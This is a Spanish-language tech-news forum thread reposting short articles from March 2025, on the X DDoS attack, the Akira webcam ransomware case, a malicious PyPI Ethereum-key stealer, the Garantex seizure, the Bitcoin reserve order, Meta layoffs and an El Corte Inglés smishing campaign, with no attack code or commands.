Microsoft afirma que SgrmBroker.exe actualmente no tiene ninguna función y que este error no afecta a ninguna funcionalidad del dispositivo, que se solucionará en futuras actualizaciones.

Puede encontrar una lista completa de correcciones en el boletín de soporte KB5053606 y en el boletín de actualización preliminar KB5052077 del mes pasado.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#12

Noticias Informáticas / X sufre un «ciberataque masivo» DDoS de Dark Storm

Marzo 11, 2025, 12:44:30 AM

El grupo hacktivista Dark Storm afirma estar detrás de los ataques DDoS que causaron múltiples interrupciones en X en todo el mundo el lunes, lo que llevó a la empresa a habilitar las protecciones DDoS de Cloudflare.

Si bien el propietario de X, Elon Musk, no declaró específicamente que los ataques DDoS estuvieran detrás de las interrupciones, sí confirmó que fueron causados por un "ciberataque masivo".

"Hubo (todavía hay) un ciberataque masivo contra X", publicó Musk en X.

"Nos atacan todos los días, pero esto se hizo con muchos recursos. Está involucrado un grupo grande y coordinado y/o un país. Rastreando..."

Dark Storm es un grupo hacktivista pro-palestino que se lanzó en 2023 y anteriormente ha atacado a organizaciones en Israel, Europa y los EE. UU.

Hoy, el grupo publicó en su canal de Telegram que estaban realizando ataques DDoS contra Twitter, compartiendo capturas de pantalla y enlaces al sitio No tienes permitido ver enlaces. Registrate o Entra a tu cuenta como prueba del ataque.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta es un sitio web que permite a los visitantes comprobar la disponibilidad de un sitio web desde distintos servidores en todo el mundo. El sitio web se utiliza habitualmente durante ataques DDoS para demostrar que se está produciendo un ataque.

Publicación de Dark Storm en Telegram

X ahora está protegido por el servicio de protección DDoS Cloudflare, que muestra un captcha cuando direcciones IP sospechosas se conectan al sitio cuando una sola dirección IP genera demasiadas solicitudes.

La sección No tienes permitido ver enlaces. Registrate o Entra a tu cuenta del sitio actualmente muestra un captcha de Cloudflare para todas las solicitudes.

Los hacktivistas han demostrado una y otra vez su capacidad para desestabilizar plataformas tecnológicas masivas utilizando botnets y otros recursos.

En 2024, Estados Unidos acusó a dos hermanos sudaneses por la presunta operación del grupo hacktivista Anonymous Sudan.

Anonymous Sudan logró derribar los sitios web y las API de algunas de las empresas tecnológicas más importantes, incluidas Cloudflare, Microsoft y OpenAI, lo que interrumpió los servicios de muchas empresas en todo el mundo.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#13

Noticias Informáticas / El nuevo Battlefield 6 para PC: Requisitos

Marzo 10, 2025, 11:15:55 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Los requisitos de Battlefield 6 todavía no se han confirmado oficialmente, pero sabemos que este juego está siendo desarrollado en fase beta sobre la base de Battlefield Labs, y este tiene unos requisitos perfectamente definidos que acabarán siendo la base a nivel de hardware de dicho juego.

Puede que conforme avance el desarrollos se produzcan pequeños cambios gracias a la optimización, pero en general no debemos esperar ninguna modificación importante, porque la base del juego no va a cambiar de forma drástica, y porque la base de este seguirá siendo la misma.

Requisitos mínimos de Battlefield 6

•   Windows 10 como sistema operativo (64 bits).
•   Procesador Intel Core i5-8400 o AMD Ryzen 5 2600 (6 núcleos).
•   16 GB de memoria RAM.
•   Tarjeta gráfica GeForce RTX 2060 o AMD Radeon RX 5600 XT con 6 GB de memoria gráfica.
•   Unidad de almacenamiento SSD con 100 GB libres.

Con esta configuración el juego debería funcionar sin problemas en 1080p y calidad media manteniendo más de 30 FPS.

Requisitos recomendados de Battlefield 6

•   Windows 10 como sistema operativo (64 bits).
•   Procesador Intel Core i7-10700K o AMD Ryzen 7 3700X (8 núcleos y 16 hilos).
•   16 GB de memoria RAM.
•   Tarjeta gráfica GeForce RTX 3060 Ti o AMD Radeon RX 6700 XT con 8 GB de memoria gráfica.
•   Unidad de almacenamiento SSD con 100 GB libres.

Esta configuración nos permitirá jugarlo en 1080p con calidad muy alta o máxima manteniendo 60 FPS.

A partir de esos requisitos, que son oficiales para la versión beta de Battlefield 6 que se puede jugar a través de Battlefield Labs, podemos hacer una estimación de lo que necesitaremos para jugar sin problemas en resoluciones superiores.

Requisitos recomendados para 1440p

•   Windows 10 como sistema operativo (64 bits).
•   Procesador Intel Core i7-11700K o AMD Ryzen 7 5700X (8 núcleos y 16 hilos).
•   16 GB de memoria RAM.
•   Tarjeta gráfica GeForce RTX 3080 o AMD Radeon RX 6800 XT con 10 GB de memoria gráfica.
•   Unidad de almacenamiento SSD con 100 GB libres.

Requisitos recomendados para 2160p

•   Windows 10 como sistema operativo (64 bits).
•   Procesador Intel Core i7-11700K o AMD Ryzen 7 5700X (8 núcleos y 16 hilos).
•   16 GB de memoria RAM.
•   Tarjeta gráfica GeForce RTX 4080 o AMD Radeon RX 7900 XTX con 16 GB de memoria gráfica.
•   Unidad de almacenamiento SSD con 100 GB libres.

Battlefield 6 será exclusivo de PC, Xbox Series X-Series S y PS5

EA aprendió la lección con Battlefield 2042, un juego que ha sido una de las peores entregas de la franquicia, y que se vio muy lastrado por las limitaciones de las consolas de la generación anterior. Los equipos que están al frente del desarrollo de Battlefield 6 lo han planteado desde el principio como un juego exclusivo de la generación actual, y esto va a permitir mejoras técnicas imporantes.

Además de un salto gráfico notable derivado del uso de un motor más avanzado, y de una geometría más compleja, en Battlefield 6 nos encontraremos con unos efectos de físicas y de destrucción espectaculares que prometen transformar por completo la experiencia de juego. Gracias a esos nuevos efectos podremos, por ejemplo, destruir por completo edificios donde nuestros enemigos estén escondidos.

Todas esas mejoras explican la gran diferencia de requisitos que existe entre Battlefield 6 y Battlefield 2042. Este último funciona en un PC con un Intel Core i5-6600K, 8 GB de RAM y una GeForce GTX 1050 Ti con 4 GB de memoria gráfica.

Fuente:
Muy Computer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#14

Noticias Informáticas / Exploit sofisticado para TP-Link a la venta

Marzo 08, 2025, 03:31:17 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un actor de amenazas supuestamente ha anunciado un exploit de ejecución remota de código (RCE) dirigido a los enrutadores TP-Link, afirmando que la herramienta puede infiltrarse en los dispositivos, persistir sin ser detectada y propagarse de forma autónoma por las redes. La publicación describe un exploit altamente sofisticado diseñado para comprometer los enrutadores que ejecutan firmware basado en LuCI.

Según las supuestas afirmaciones, el exploit permite a los atacantes obtener el control total sobre los enrutadores TP-Link seleccionados inyectando comandos a través de una supuesta vulnerabilidad. Se dice que la herramienta exfiltra datos confidenciales, desactiva las defensas de seguridad y se propaga a otros enrutadores utilizando credenciales predeterminadas. El vendedor afirma que la carga útil incluye una puerta trasera cifrada AES-256, que permite el acceso a largo plazo a los dispositivos comprometidos.

La publicación sugiere además que el exploit está disponible para su compra, con un precio que comienza en $ 1,000 para el script base y $ 2,000 para un "paquete completo" que incluye soporte y pruebas. El actor detrás de la supuesta venta enfatiza que se trata de una herramienta de hacking de alta gama, comparando sus capacidades con los kits RCE masivos que pueden alcanzar hasta 5.000 dólares en los mercados clandestinos.

Fuente:
DailyDarkWeb
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#15

Noticias Informáticas / Trump firma orden ejecutiva para establecer reserva gubernamental de Bitcoin

Marzo 06, 2025, 11:56:54 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

El presidente Donald Trump firmó el jueves una orden ejecutiva que establece una reserva gubernamental de bitcoin, un indicador clave en el camino de la criptomoneda hacia una posible aceptación generalizada.

Según la nueva orden de Trump, el gobierno de Estados Unidos retendrá los aproximadamente 200.000 bitcoins que ya ha confiscado en procedimientos penales y civiles, según el "zar de las criptomonedas" de Trump, David Sacks.

"Estados Unidos no venderá ningún bitcoin depositado en la Reserva. Se mantendrá como una reserva de valor. La Reserva es como un Fort Knox digital para la criptomoneda a menudo llamada 'oro digital'", dijo Sacks en las redes sociales.

La orden ejecutiva exige una "contabilidad completa" de las tenencias de bitcoins del gobierno, que, según Sacks, nunca han sido auditadas por completo. Agregó que el gobierno de Estados Unidos ha vendido previamente alrededor de 195.000 bitcoins en la última década por 366 millones de dólares. Dijo que esos bitcoins valdrían alrededor de 17.000 millones de dólares si el gobierno no los hubiera vendido.

Sacks dijo que la orden permite a los Departamentos del Tesoro y de Comercio "desarrollar estrategias neutrales en términos presupuestarios para adquirir bitcoins adicionales".

Trump, que hace unos años dijo que el bitcoin "parecía una estafa", adoptó las monedas digitales y se inclinó hacia su papel no oficial como el "presidente de las criptomonedas" de maneras que pueden ayudar a la industria de las criptomonedas y enriquecerse a sí mismo y a su familia. Los actores ricos de la industria de las criptomonedas, que se sintieron injustamente atacados por la administración Biden, gastaron mucho para ayudar a Trump a ganar las elecciones del año pasado.

Establecer una reserva de bitcoins fue una de las varias promesas relacionadas con las criptomonedas que Trump hizo durante la campaña electoral del año pasado. Trump también está presionando al Congreso para que apruebe una legislación favorable a la industria, y bajo su administración la Comisión de Bolsa y Valores ha comenzado a abandonar las medidas de cumplimiento que había tomado contra algunas de las principales empresas de criptomonedas. El viernes, Trump tiene previsto recibir a muchos líderes clave de la industria en una "Cumbre de criptomonedas" en la Casa Blanca.

Bitcoin es la criptomoneda más antigua y popular. Creado en respuesta a la crisis financiera de 2008 por una o más personas anónimas, Bitcoin ha florecido a partir de un experimento de entusiastas de la criptografía libertaria hasta convertirse en un activo con una capitalización de mercado de aproximadamente 1,7 billones de dólares. Si bien no ha despegado como una forma de pagar por cosas cotidianas, Bitcoin ha ganado popularidad como una reserva de valor que no está controlada por bancos, gobiernos u otras entidades poderosas.

El suministro de bitcoin está limitado a 21 millones de monedas, una escasez incorporada que, según sus partidarios, lo convierte en una gran protección contra la inflación. Los críticos llevan mucho tiempo diciendo que el bitcoin carece de valor inherente, pero hasta ahora ha desafiado a los detractores con notables aumentos de precio. Algunos partidarios de una reserva estratégica de bitcoins dijeron que algún día podría ayudar a pagar la deuda nacional de Estados Unidos.

Los precios de las criptomonedas se dispararon después de la victoria de Trump el año pasado, y cuando el precio del bitcoin superó por primera vez los 100.000 dólares a principios de diciembre, Trump se atribuyó el mérito y publicó "¡DE NADA!" en las redes sociales.

Pero desde entonces los precios se han enfriado. La orden ejecutiva de Trump no se tradujo en un aumento inmediato del precio del bitcoin, que cotizaba en torno a los 86.000 dólares poco después de su anuncio.

La orden ejecutiva también crea una "reserva de activos digitales de EE. UU.", donde el gobierno mantendrá las criptomonedas confiscadas distintas del bitcoin. El domingo, Trump hizo que los precios de las criptomonedas experimentaran un breve aumento tras un anuncio sorpresa de que quería que el gobierno mantuviera en su poder las criptomonedas menos conocidas XRP, solana y cardano.

Fuente:
msn News
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#16

Noticias Informáticas / Microsoft desarticula campaña de publicidad maliciosa

Marzo 06, 2025, 11:19:12 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Microsoft ha eliminado una cantidad no revelada de repositorios de GitHub utilizados en una campaña masiva de publicidad maliciosa que afectó a casi un millón de dispositivos en todo el mundo.

Los analistas de amenazas de la compañía detectaron estos ataques a principios de diciembre de 2024 después de observar que varios dispositivos descargaban malware de los repositorios de GitHub, malware que luego se utilizó para implementar una serie de otras cargas útiles en los sistemas comprometidos.

Después de analizar la campaña, descubrieron que los atacantes inyectaron anuncios en videos en sitios web de transmisión pirateados ilegales que redirigen a las víctimas potenciales a repositorios maliciosos de GitHub bajo su control.

"Los sitios web de transmisión incorporaron redireccionadores de publicidad maliciosa dentro de los fotogramas de las películas para generar ingresos de pago por visualización o pago por clic a partir de plataformas de publicidad maliciosa", explicó Microsoft hoy. "Estos redireccionadores posteriormente enrutaron el tráfico a través de uno o dos redireccionadores maliciosos adicionales, lo que finalmente llevó a otro sitio web, como un sitio web de malware o de estafa de soporte técnico, que luego redirigió a GitHub".

Los videos de publicidad maliciosa redireccionaban a los usuarios a los repositorios de GitHub que los infectaban con malware diseñado para realizar el descubrimiento del sistema, recopilar información detallada del sistema (por ejemplo, tamaño de la memoria, detalles gráficos, resolución de pantalla, sistema operativo (OS) y rutas de usuario) y exfiltrar los datos recopilados mientras se implementaban cargas útiles adicionales de la etapa dos.

Luego, una carga útil de script de PowerShell de tercera etapa descarga el troyano de acceso remoto (RAT) NetSupport desde un servidor de comando y control y establece persistencia en el registro para el RAT. Una vez ejecutado, el malware también puede implementar el malware ladrón de información Lumma y el ladrón de información de código abierto Doenerium para exfiltrar datos de usuario y credenciales del navegador.

Etapas del ataque

Por otro lado, si la carga útil de la tercera etapa es un archivo ejecutable, crea y ejecuta un archivo CMD mientras coloca un intérprete de AutoIt renombrado con una extensión .com. Luego, este componente de AutoIt lanza el binario y puede colocar otra versión del intérprete de AutoIt con una extensión .scr. También se implementa un archivo JavaScript para ayudar a ejecutar y obtener persistencia para los archivos .scr.

En la última etapa del ataque, las cargas útiles de AutoIt usan RegAsm o PowerShell para abrir archivos, habilitar la depuración remota del navegador y exfiltrar información adicional. En algunos casos, PowerShell también se usa para configurar rutas de exclusión para Windows Defender o para colocar más cargas útiles de NetSupport.

Si bien GitHub fue la plataforma principal para alojar las cargas útiles entregadas durante la primera etapa de la campaña, Microsoft Threat Intelligence también observó cargas útiles alojadas en Dropbox y Discord.

"Esta actividad se rastrea bajo el nombre genérico Storm-0408 que utilizamos para rastrear a numerosos actores de amenazas asociados con el acceso remoto o malware de robo de información y que utilizan campañas de phishing, optimización de motores de búsqueda (SEO) o publicidad maliciosa para distribuir cargas útiles maliciosas", dijo Microsoft.

"La campaña afectó a una amplia gama de organizaciones e industrias, incluidos dispositivos de consumo y empresariales, lo que destaca la naturaleza indiscriminada del ataque".

El informe de Microsoft proporciona información adicional y más detallada sobre las distintas etapas de los ataques y las cargas útiles utilizadas en la cadena de ataque de múltiples etapas de esta compleja campaña de publicidad maliciosa.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#17

Noticias Informáticas / Banda de ransomware encriptó red desde una cámara web para evitar el EDR

Marzo 06, 2025, 11:16:35 PM

La banda de ransomware Akira fue descubierta usando una cámara web no segura para lanzar ataques de cifrado en la red de una víctima, eludiendo eficazmente Endpoint Detection and Response (EDR), que estaba bloqueando el cifrador en Windows.

El equipo de la empresa de ciberseguridad S-RM descubrió el inusual método de ataque durante una respuesta a un incidente reciente en uno de sus clientes.

Cabe destacar que Akira solo pasó a la cámara web después de intentar implementar cifradores en Windows, que fueron bloqueados por la solución EDR de la víctima.

La cadena de ataque poco ortodoxa de Akira

Los actores de la amenaza obtuvieron inicialmente acceso a la red corporativa a través de una solución de acceso remoto expuesta en la empresa objetivo, probablemente aprovechando credenciales robadas o forzando la contraseña.

Después de obtener acceso, implementaron AnyDesk, una herramienta de acceso remoto legítima, y robaron los datos de la empresa para usarlos como parte del ataque de doble extorsión.

A continuación, Akira utilizó el Protocolo de escritorio remoto (RDP) para moverse lateralmente y expandir su presencia a tantos sistemas como fuera posible antes de implementar la carga útil del ransomware.

Finalmente, los actores de la amenaza descargaron un archivo ZIP protegido con contraseña (win.zip) que contenía la carga útil del ransomware (win.exe), pero la herramienta EDR de la víctima lo detectó y lo puso en cuarentena, bloqueando esencialmente el ataque.

Después de este fallo, Akira exploró vías de ataque alternativas, escaneando la red en busca de otros dispositivos que pudieran usarse para cifrar los archivos y encontrando una cámara web y un escáner de huellas dactilares.

S-RM explica que los atacantes optaron por la cámara web porque era vulnerable al acceso remoto a través del shell y a la visualización no autorizada de transmisiones de video.

Además, se ejecutaba en un sistema operativo basado en Linux compatible con el cifrador Linux de Akira. Tampoco tenía un agente EDR, lo que la convertía en un dispositivo óptimo para cifrar archivos de forma remota en recursos compartidos de red.

Resumen de los pasos de ataque de Akira

S-RM confirmó que los actores de la amenaza utilizaron el sistema operativo Linux de la cámara web para montar los recursos compartidos de red SMB de Windows de los otros dispositivos de la empresa. Luego, iniciaron el cifrador Linux en la cámara web y lo usaron para cifrar los recursos compartidos de red a través de SMB, eludiendo de manera efectiva el software EDR en la red.

"Como el dispositivo no estaba siendo monitoreado, el equipo de seguridad de la organización víctima no estaba al tanto del aumento del tráfico malicioso de Server Message Block (SMB) desde la cámara web al servidor afectado, que de lo contrario podría haberlos alertado", explica S-RM.

"Akira pudo posteriormente cifrar archivos en toda la red de la víctima".

S-RM le dijo que había parches disponibles para las fallas de la cámara web, lo que significa que el ataque, o al menos este vector, era evitable.

El caso muestra que la protección EDR no es una solución de seguridad integral y que las organizaciones no deberían confiar únicamente en ella para protegerse contra los ataques.

Además, los dispositivos IoT no se controlan ni se mantienen tan de cerca como las computadoras, pero aun así representan un riesgo significativo.

Debido a esto, estos tipos de dispositivos deben aislarse de las redes más sensibles, como los servidores de producción y las estaciones de trabajo.

De igual importancia, todos los dispositivos, incluso los IoT, deben tener su firmware actualizado regularmente para corregir fallas conocidas que podrían explotarse en ataques.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#18

Noticias Informáticas / Se confisca intercambio de criptomonedas Garantex utilizado por bandas de ransom

Marzo 06, 2025, 11:13:44 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

El Servicio Secreto de Estados Unidos ha confiscado el dominio de la plataforma de intercambio de criptomonedas rusa Garantex, en colaboración con la División Penal del Departamento de Justicia, el FBI y Europol.

Otras autoridades policiales implicadas en esta acción son la Policía Nacional Holandesa, la Oficina Federal de Policía Criminal de Alemania, la Fiscalía General de Frankfurt, la Policía Criminal Nacional de Estonia y la Oficina Nacional de Investigación de Finlandia.

Hoy temprano, Garantex también se vio obligada a suspender sus servicios debido a que Tether bloqueó sus billeteras digitales después de que la Unión Europea sancionara a la plataforma de intercambio de criptomonedas como parte de su 16º paquete de sanciones contra Rusia, que apunta a 542 personas y entidades.

"Tenemos malas noticias. Tether entró en la guerra contra el mercado criptográfico ruso y bloqueó nuestras billeteras por un monto de más de 2.500 millones de rublos", dijo el equipo de Garantex en una publicación de Telegram el jueves.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

"Suspenderemos temporalmente la prestación de todos los servicios, incluidos los de búsqueda de criptomonedas, mientras todo el equipo resuelve este problema. ¡Estamos luchando y no nos rendiremos! Queremos llamar su atención sobre el hecho de que todos los USDT en las billeteras rusas están ahora en peligro".

Después de confiscar el dominio de Garantex garantex[.]org, el Servicio Secreto también cambió los servidores de nombres a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.

La plataforma rusa de intercambio fue sancionada previamente por la Oficina de Control de Activos Extranjeros (OFAC) del Departamento del Tesoro en abril de 2022 después de que más de 100 millones de dólares en transacciones de Garantex se vincularan a mercados de la dark web y actores del cibercrimen, incluida la notoria operación Conti Ransomware-as-a-service (RaaS) y el mercado de la dark web Hydra.

"La mayoría de las operaciones de Garantex se llevan a cabo en Moscú, incluida la Federation Tower, y en San Petersburgo, Rusia, donde también han operado otras plataformas de intercambio de monedas virtuales sancionadas", dijo la OFAC en ese momento.

Garantex perdió su licencia para proporcionar servicios de moneda virtual en febrero de 2022 después de que la Unidad de Inteligencia Financiera de Estonia encontrara vínculos entre Garantex y billeteras utilizadas para actividades delictivas y problemas críticos de cumplimiento con las políticas contra el lavado de dinero y la financiación del terrorismo (ALD/CFT).

"A pesar de perder su licencia estonia para proporcionar servicios de moneda virtual tras la investigación de la Unidad de Inteligencia Financiera de Estonia, Garantex continúa brindando servicios a los clientes a través de medios inescrupulosos", agregó la OFAC.

Dos años después, la OFAC sancionó a las bolsas de criptomonedas Cryptex y PM2BTC por lavar fondos para bandas de ransomware rusas y otros grupos de ciberdelincuencia.

También apuntó a las bolsas de criptomonedas Bitpapa, TOEP y Crypto Explorer en marzo de 2024 y designó a los servicios de mezcla de criptomonedas Sinbad, Tornado Cash y No tienes permitido ver enlaces. Registrate o Entra a tu cuenta por lavar dinero para el grupo de piratería norcoreano Lazarus.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#19

Noticias Informáticas / Stealer de claves privadas de Ethereum oculto en PyPI

Marzo 06, 2025, 11:11:38 PM

Un paquete malicioso Python Package Index (PyPI) llamado "set-utils" ha estado robando claves privadas de Ethereum a través de funciones de creación de billeteras interceptadas y filtrándolas a través de la cadena de bloques Polygon.

El paquete se disfraza como una utilidad para Python, imitando al popular "python-utils", que tiene más de 712 millones de descargas, y "utils", que cuenta con más de 23,5 millones de instalaciones.

Los investigadores de la plataforma de ciberseguridad para desarrolladores Socket descubrieron el paquete malicioso e informaron que set-utils se había descargado más de mil veces desde su envío a PyPI el 29 de enero de 2025.

La empresa de seguridad de la cadena de suministro de código abierto informa que los ataques se dirigen principalmente a los desarrolladores de cadenas de bloques que utilizan "eth-account" para la creación y gestión de billeteras, proyectos DeFi basados en Python, aplicaciones Web3 con soporte para Ethereum y billeteras personales que utilizan la automatización de Python.

El paquete malicioso en PyPI

Como el paquete malicioso está dirigido a proyectos de criptomonedas, aunque solo hubo mil descargas, podría afectar a una cantidad mucho mayor de personas que usaron las aplicaciones para generar billeteras.

Robo sigiloso de claves de Ethereum

El paquete malicioso set-utils incorpora la clave pública RSA del atacante para usarla para cifrar los datos robados y una cuenta de remitente de Ethereum controlada por el atacante.

El paquete se conecta a las funciones estándar de creación de billeteras de Ethereum como 'from_key()' y 'from_mnewmonic()' para interceptar las claves privadas a medida que se generan en la máquina comprometida.

Luego, cifra la clave privada robada y la integra en el campo de datos de una transacción de Ethereum antes de enviarla a la cuenta del atacante a través del punto final Polygon RPC "No tienes permitido ver enlaces. Registrate o Entra a tu cuenta".

Exfiltración de claves privadas robadas

En comparación con los métodos tradicionales de exfiltración de red, la incorporación de datos robados en transacciones de Ethereum es mucho más sigilosa y más difícil de distinguir de la actividad legítima.

Los firewalls y las herramientas antivirus suelen monitorear las solicitudes HTTP, pero no las transacciones de blockchain, por lo que es poco probable que este método genere alertas o se bloquee.

Además, las transacciones de Polygon tienen tarifas de procesamiento muy bajas, no se aplica ningún límite de velocidad a las transacciones pequeñas y ofrecen puntos finales RPC públicos gratuitos, por lo que los actores de amenazas no necesitan configurar su propia infraestructura.

Una vez que se realiza el proceso de exfiltración, el atacante puede recuperar los datos robados en cualquier momento, ya que la información robada se almacena de forma permanente en la blockchain.

El paquete set-utils se eliminó de PyPI después de su descubrimiento. Sin embargo, los usuarios y desarrolladores de software que lo incorporaron a sus proyectos deben desinstalarlo de inmediato y asumir que todas las billeteras Ethereum creadas están comprometidas.

Si dichas billeteras contienen fondos, se recomienda moverlas a otra billetera lo antes posible, ya que corren el riesgo de ser robadas en cualquier momento.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#20

Noticias Informáticas / Mark Zuckerberg despide al 5% de los desarrolladores de Meta

Marzo 06, 2025, 04:52:15 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Mark Zuckerberg y su empresa Meta han sido protagonistas de despidos masivos en una de las más reconocidas empresas tecnológicas del mundo y, además, muchos de estos despidos han sido polémicos.

Hoy tenemos una nueva historia al respecto: cuando el líder de Facebook e Instagram dijo hace unas semanas que echaba a la calle al 5% de los desarrolladores de Meta alegando su "bajo rendimiento", en realidad fue por otra razón, según los ex empleados.

Muchos ex empleados han hablado ahora, en diversas redes sociales, explicando que realmente los echaron por haberse tomado bajas por enfermedad o por maternidad y paternidad, por teletrabajar o por tomar sus vacaciones. Y, además algunos de los programadores despedidos dicen que Meta se ha convertido en "la empresa tecnológica más mala" de Silicon Valley. Las redes sociales como LinkedIn se han llenado de publicaciones de estos trabajadores contando su versión de los hechos.

Cabe recordar que aunque casi 4.000 despidos fueron anunciado en enero y esas personas ya están en la calle, la empresa lleva años de grandes beneficios. Por ejemplo, en agosto Meta informó de un beneficio superior al esperado, de 13.500 millones de dólares entre abril junio ascendieron. Sus ingresos del tercer trimestre de 2024 ascendieron a 40.580 millones de dólares, un récord trimestral, tras un aumento del 19% interanual.

Meta despide a gente por tener hijos

En Blind, una aplicación anónima para empleados verificados que se utiliza a menudo en el sector tecnológico, hay varias versiones de los hechos que recoge Fortune. Además de las acusaciones de que la empresa hizo un mal uso de la etiqueta de bajo rendimiento, algunos también afirmaron que Meta los despidió mientras estaban de baja por enfermedad.

Una mujer explica que superó "constantemente las expectativas durante varios años, tuve un bebé en 2024 y me despidieron". Otra persona recuerda que "docenas de personas con un historial impecable y calificaciones superiores fueron despedidas cuando se tomaron una licencia por maternidad o por enfermedad".

Otra mujer también dice que estuvo de baja por maternidad durante seis meses agregó que no tenía "antecedentes de desempeño por debajo del promedio" y está buscando asesoramiento legal. Otro ex trabajador de Meta calificó los despidos de crueles y agregó que algunas personas recibieron a la fuerza calificaciones "más bajas" mientras estaban de baja por enfermedad.

Dicen que muchas personas despedidas llevaban diez años en la empresa, sin quejas de sus superiores y son ahora despedidos cuando tienen hijos. De hecho, un empleado de Amazon escribió que cree que Meta realmente ahora es solo para trabajadores jóvenes sin familia que "no tienen nada más en qué concentrarse que en ganar dinero".

La energía masculina de Zuck, en cuestión

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

También en LinkedIn, muchos profesionales que estuvieron años en Meta se han lanzado a criticar a su antiguo empleador. Uno afirma que él no es "un trabajador de bajo rendimiento" y otro también dice que esa etiqueta puesta por el magnate "es engañosa y, para muchos de nosotros, es totalmente errónea".

Además de las quejas de los profesionales despedidos, LinkedIn se ha llenado de análisis de qué significa esa etiqueta de trabajadores de bajo rendimiento y cómo las empresas lo están usando de malas formas.

Hay expertos recordando que a las empresas como Meta les preocupa más lo que piensan sus accionistas que el personal que trabaja para ellos:

"No nos importa que etiquetar a quienes despedimos como "de bajo rendimiento" perjudique su capacidad de encontrar otro trabajo y, por último, no asumimos ninguna responsabilidad por cómo estas personas llegaron aquí o por su desempeño aquí...", dicen que sería lo más correcto de explicar al anunciar los despidos.

Una abogada —que se burló de"la nueva energía masculina de Zuckerberg"— se ofreció a proporcionar todos los datos que puedan demostrar que las acusaciones son falsas:
"Tengo las evaluaciones que lo demuestran, y un sinfín de compañeros y jefes pueden dar fe de mi trabajo".

En su publicación, dice no estar enfadada por el despido, sino por que se haya difamado su labor. Y afirma que no va a echar de menos que su "trayectoria profesional esté sujeta a los caprichos de decisiones de productos sobre las que no tengo control, la sobrecarga mental, tener 62 pestañas en el PC abiertas, ver cómo se desprecian productos, la nueva "energía masculina" de Zuck y convertirse en su daño colateral".

Como recoge Business Insider, un científico de datos también subió capturas de pantalla mostrando elogios a su rendimiento, que indicaban que habitualmente "superaba las expectativas".

Fuente:
Genbeta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#21

Noticias Informáticas / Campaña de estafas vía SMS contra usuarios del Corte Inglés

Marzo 06, 2025, 04:48:55 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

hace unos días, que El Corte Inglés había sido víctima de un ciberataque y que, como resultado de ello, los datos de sus clientes se habían filtrado. Aunque la compañía ha pretendido tranquilizar a estos asegurando que la información filtrada no permite realizar pagos ni operar con las tarjetas, la Organización de Consumidores y Usuarios (OCU) sí ha alertado sobre otros posibles fraudes derivados de esta brecha de seguridad.

Casualmente, este incidente coincide en el tiempo con una reciente campaña de smishing (SMS con enlaces maliciosos) en la que los ciberdelincuentes han intentado suplantar la identidad de la entidad financiera de El Corte Inglés con el objetivo de robar credenciales de acceso.

El ciberataque y sus implicaciones

El pasado domingo, 2 de marzo, El Corte Inglés informó que uno de sus proveedores externos había sufrido un acceso no autorizado a datos personales de clientes: la información filtrada incluía datos identificativos, de contacto (como el número del móvil) y números de tarjetas utilizadas exclusivamente en El Corte Inglés. Según la compañía, esta información no permite realizar pagos ni transacciones fraudulentas.

El incidente fue detectado y subsanado de inmediato, y la empresa ha exigido al proveedor la aplicación de medidas de seguridad adicionales. No obstante, la filtración ha generado preocupación, ya que resultaba evidente que los ciberdelincuentes podrían aprovechar estos datos para promover timos de phishing, vishing o smishing, con los que se podía manipular a los clientes para que revelasen credenciales de acceso (entre otra mucha información).

El fraude del 'smishing': suplantación de la Financiera El Corte Inglés

De manera paralela a que la compañía desvelase este ciberataque, se ha detectado el citado fraude de smishing en el que delincuentes envían mensajes de texto con el identificador fraudulento 'FinancieraElCorteIngles', y en los que se alerta a los clientes sobre una compra inexistente por un importe de 950 euros, instándoles a hacer clic en un enlace si no reconocen como propia dicha compra.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Como suele ocurrir en esta clase de campañas, el miedo del usuario a perder dinero es utilizado para arma para convencerle de proporcionar al delincuente los datos que necesitará... para robarle el dinero.

Al acceder al enlace, el usuario es dirigido a una página web falsa que imita el diseño del portal oficial de la Financiera El Corte Inglés. En este sitio fraudulento se solicitan datos de acceso como el DNI y la contraseña, permitiendo a los estafadores obtener información crítica que permite acceder a las cuentas reales.

Cómo protegerse ante estos ataques

Dado que los ciberdelincuentes podrían utilizar los datos filtrados para cometer estos y otros fraudes, El Corte Inglés y la OCU han emitido una serie de recomendaciones para los clientes:

1.   Desconfiar de mensajes y llamadas sospechosas: El Corte Inglés ya ha dejado claro que nunca solicitará datos personales, contraseñas o códigos de seguridad por teléfono, correo electrónico o SMS.

2.   Verificar la URL de los sitios web: Antes de ingresar datos en una página, asegurarse de que la dirección corresponde a la oficial (No tienes permitido ver enlaces. Registrate o Entra a tu cuenta).

3.   No responder a mensajes con tono de urgencia: Los ciberdelincuentes suelen utilizar estrategias de miedo y presión para que las víctimas actúen sin pensar.

4.   Practicar egosurfing: Buscar el propio nombre en internet para comprobar si los datos personales han sido filtrados y utilizados de manera indebida.

